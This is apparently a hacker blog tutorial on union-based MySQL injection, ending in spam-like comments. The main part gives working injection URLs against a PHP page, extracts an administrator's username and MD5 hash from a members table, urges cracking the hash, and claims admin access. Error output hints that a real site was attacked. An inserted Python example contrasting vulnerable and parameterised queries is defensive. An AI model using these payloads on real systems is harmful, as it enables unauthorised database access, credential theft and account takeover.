Simple MySQL injection
Hi, the reason for reading my article:
- A fast way to find the injection template
Injection is a type of attack that an attacker may use to gain access to a target. Many kinds of SQL injection attack are available, and the one chosen against a victim depends on the database in use, such as "MySQL, MsSQL, Oracle …". I've chosen MySQL … in future I'll analyze it using vulnerable PHP code.
Fortunately, if error messages are returned from the application (the default PHP behavior), the attacker can determine the entire structure of the database and read any value that can be read by the account the PHP application uses to connect to the MySQL server.
Make an error by using special characters like ' and -1'. The following example shows how it can be done:
http://target/forgotobj.php?id=1'
- This produces an error:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\" at line 1
Use the SQL query "Union Select" to find the number of columns that produces no error; the syntax is shown below:
http://target.com/forgotobj.php?id=-1/**/union/**/select/**/1,2,3,4,5--
If the guessed number of columns is right, no error is shown; instead something like 2 or 3 appears on the web site, and it can be replaced with anything …
http://target/forgotobj.php?id=-1/**/union/**/select/**/1,current_user(),3,4,5--
- You will see the current user in place of the number that was replaced, for example:
User@localhost
In other words, the column name should be put in place of one of the numbers shown on the web site by the query!
The hacker is going to find the table names and the related column names. In basic MySQL injection he guesses that the table could be named something like "users", "user", "admin", "members". In advanced mode there are some professional ways (not very) to find it out; I'm not going to explain them right now … Continue:
target/forgotobj.php?id=-1/**/union/**/select/**/1,2,3,4,5/**/from/**/users
- A table name which doesn’t exist will cause the application to return an error :
Table 'taxirani_taxi.users' doesn't exist
- In another test:
id=-1/**/union/**/select/**/1,2,3,4,5/**/from/**/member
- No error means it worked. The column names are similar to everyday words … Examples: "user", "username", "pass", "password"
id=-1/**/union/**/select/**/1,username,password,4,5/**/from/**/member
- Eventually the attacker arrives at the following user name and password of the administrator:
admin
0b953853de8bb3d65a51e08844c4c767
For md5 it's not imba, I think you know that: md5 hashes are made from the range "0-9,a,b,c,d,e,f" and must be 32 bytes! Cracking is your job; I used my PHP md5 cracker, and I got administrator!
Everything I said can be found in the tutorial clip I've recorded before :p loading here. If I get time and want to write about MsSQL injection, I'm sure I will write a powerful and complete tutorial from beginning to end, but I recommend you refer to Mormoroth and his damn movies.
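Why the requests above work, and what stops them, as an added example that is not code from the original post: a hypothetical lookup that pastes `id` into the SQL text and echoes driver errors, next to one that validates the value, binds it as a parameter and returns a fixed error. SQLite stands in for MySQL so it runs offline; the table layout, function names and stored values are constructed.

```python
import sqlite3

COLS = "id, name, descr, owner, note"   # five columns, like the article's 1,2,3,4,5
# Request value quoted from the article; the row it reads here is constructed.
PAYLOAD = "-1/**/union/**/select/**/1,username,password,4,5/**/from/**/member"


def make_db():
    """In-memory stand-in for the application's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE objects (id INTEGER, name TEXT, descr TEXT, owner TEXT, note TEXT);
        INSERT INTO objects VALUES (1, 'lamp', 'desk lamp', 'alice', 'n/a');
        CREATE TABLE member (username TEXT, password TEXT);
        INSERT INTO member VALUES ('admin', 'constructed-hash-value');
    """)
    return db


def lookup_vulnerable(db, raw_id):
    """Hypothetical flawed handler: request text becomes part of the SQL
    statement, and the driver's error message is returned to the client."""
    try:
        return db.execute(f"SELECT {COLS} FROM objects WHERE id = {raw_id}").fetchall()
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"      # leaks syntax and table-name details


def lookup_hardened(db, raw_id):
    """Same lookup with three controls: input validation, a bound parameter,
    and a fixed error string (details belong in the server log only)."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return "invalid id"
    try:
        return db.execute(f"SELECT {COLS} FROM objects WHERE id = ?",
                          (int(raw_id),)).fetchall()
    except sqlite3.Error:
        return "internal error"


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'", "-1/**/union/**/select/**/1,2,3,4,5--", PAYLOAD):
        print(repr(value))
        print("  vulnerable:", lookup_vulnerable(db, value))
        print("  hardened:  ", lookup_hardened(db, value))
```

In the PHP application the equivalent controls are a prepared statement with a bound `id` and `display_errors` switched off in production.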





One could debate this point too …
Have you ever thought about starting another blog in parallel, on a related topic? You are quite good at it.
I liked it a lot, I didn't even expect to.
Aha, now I see… At first I didn't really understand how this connects to the title itself…
Very interesting. But something is missing. Maybe it would be worth adding some pictures or photos?
I decided to help you a little and submitted this post to social bookmarking sites. I really hope your rating goes up.
@ paydayVase,
I think it's not necessary, since I've recorded a clip, "Everything I said can be found in the tutorial clip recorded by me":
http://sc0rpion.net/tutorial-clips/mysql-injection.rar
It was very entertaining to read.
Thanks for the info, I read it with interest.
In principle I don't understand much in this post, but I will try to understand it anyway.
Thank you so much! Will there be more posts on this topic in the future? I'm really looking forward to them!
Hello to all! Great site. I am new here; greetings to all from Poland.
Admin, how long did it take to write this post? I'd really like to know…
@ Itannaduh: It was composed around one year ago, and ty for your opinion!
A huge heartfelt thank you, a very timely note.